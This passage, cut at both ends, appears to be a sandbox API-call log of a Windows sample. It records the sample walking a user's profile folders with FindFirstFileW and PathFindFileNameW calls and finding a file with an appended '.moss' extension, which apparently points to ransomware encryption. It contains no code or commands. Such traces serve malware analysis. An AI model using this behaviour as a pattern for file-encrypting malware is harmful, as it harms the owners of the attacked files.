HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0173.901] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.901] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.901] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.901] PathFindFileNameW (pszPath="") returned="" [0173.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x1d514040, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d514040, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0173.902] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.902] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0173.902] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.902] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.902] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.902] PathFindFileNameW (pszPath="") returned="" [0173.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x1d514040, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d514040, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyOX_xDVWOQqjcupRL", cAlternateFileName="ZYOX_X~1")) returned 0xffffffff [0173.902] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.902] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0173.902] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.902] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.902] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.902] PathFindFileNameW (pszPath="") returned="" [0173.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.903] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.903] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.903] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0173.903] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.903] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.903] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.903] PathFindFileNameW (pszPath="") returned="" [0173.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.903] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.903] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.903] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0173.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.904] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.904] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.904] PathFindFileNameW (pszPath="") returned="" [0173.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0173.904] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0173.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.904] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.904] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.904] PathFindFileNameW (pszPath="") returned="" [0173.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0173.904] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0173.905] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.905] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.905] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.905] PathFindFileNameW (pszPath="") returned="" [0173.905] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0173.905] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.905] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0173.905] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.905] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.905] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.905] PathFindFileNameW (pszPath="") returned="" [0173.905] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c3139e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c3139e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.905] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.906] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.906] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.906] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.906] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.906] PathFindFileNameW (pszPath="") returned="" [0173.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.906] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.906] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.906] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\") returned="5RddQRlUxLC956\\" [0173.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0173.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.907] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.907] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.907] PathFindFileNameW (pszPath="") returned="" [0173.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0x1c3f8220, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c3f8220, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.907] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.907] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\") returned="xxuaxzQ\\" [0173.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0173.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.907] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.907] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.907] PathFindFileNameW (pszPath="") returned="" [0173.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x1c502bc0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c502bc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.908] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.908] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.908] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0173.908] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.908] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.908] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.908] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.908] PathFindFileNameW (pszPath="") returned="" [0173.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x1c502bc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x9b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv.moss", cAlternateFileName="WSTYRM~1.MOS")) returned 0xffffffff [0173.908] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.909] PathFindFileNameW (pszPath="") returned="" [0173.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x1c502bc0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x9b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv.moss", cAlternateFileName="WSTYRM~1.MOS")) returned 0xffffffff [0173.909] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.909] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.909] PathFindFileNameW (pszPath="") returned="" [0173.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x1c528d20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c528d20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.910] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.910] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.910] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.910] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.910] PathFindFileNameW (pszPath="") returned="" [0173.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x1d74f4e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d74f4e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0173.910] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\") returned="NsI7Q_Ai4cQKUwAhGA5\\" [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.910] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.911] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.911] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.911] PathFindFileNameW (pszPath="") returned="" [0173.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0x1c60d560, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c60d560, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.911] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.911] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0173.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0173.911] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.911] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.911] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.911] PathFindFileNameW (pszPath="") returned="" [0173.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x1ce3c100, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1ce3c100, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.912] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.912] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.913] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.913] PathFindFileNameW (pszPath="") returned="" [0173.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ce883c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1ce883c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.913] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.913] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.913] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.914] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.914] PathFindFileNameW (pszPath="") returned="" [0173.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1cf46aa0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1cf46aa0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.914] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.914] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0173.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 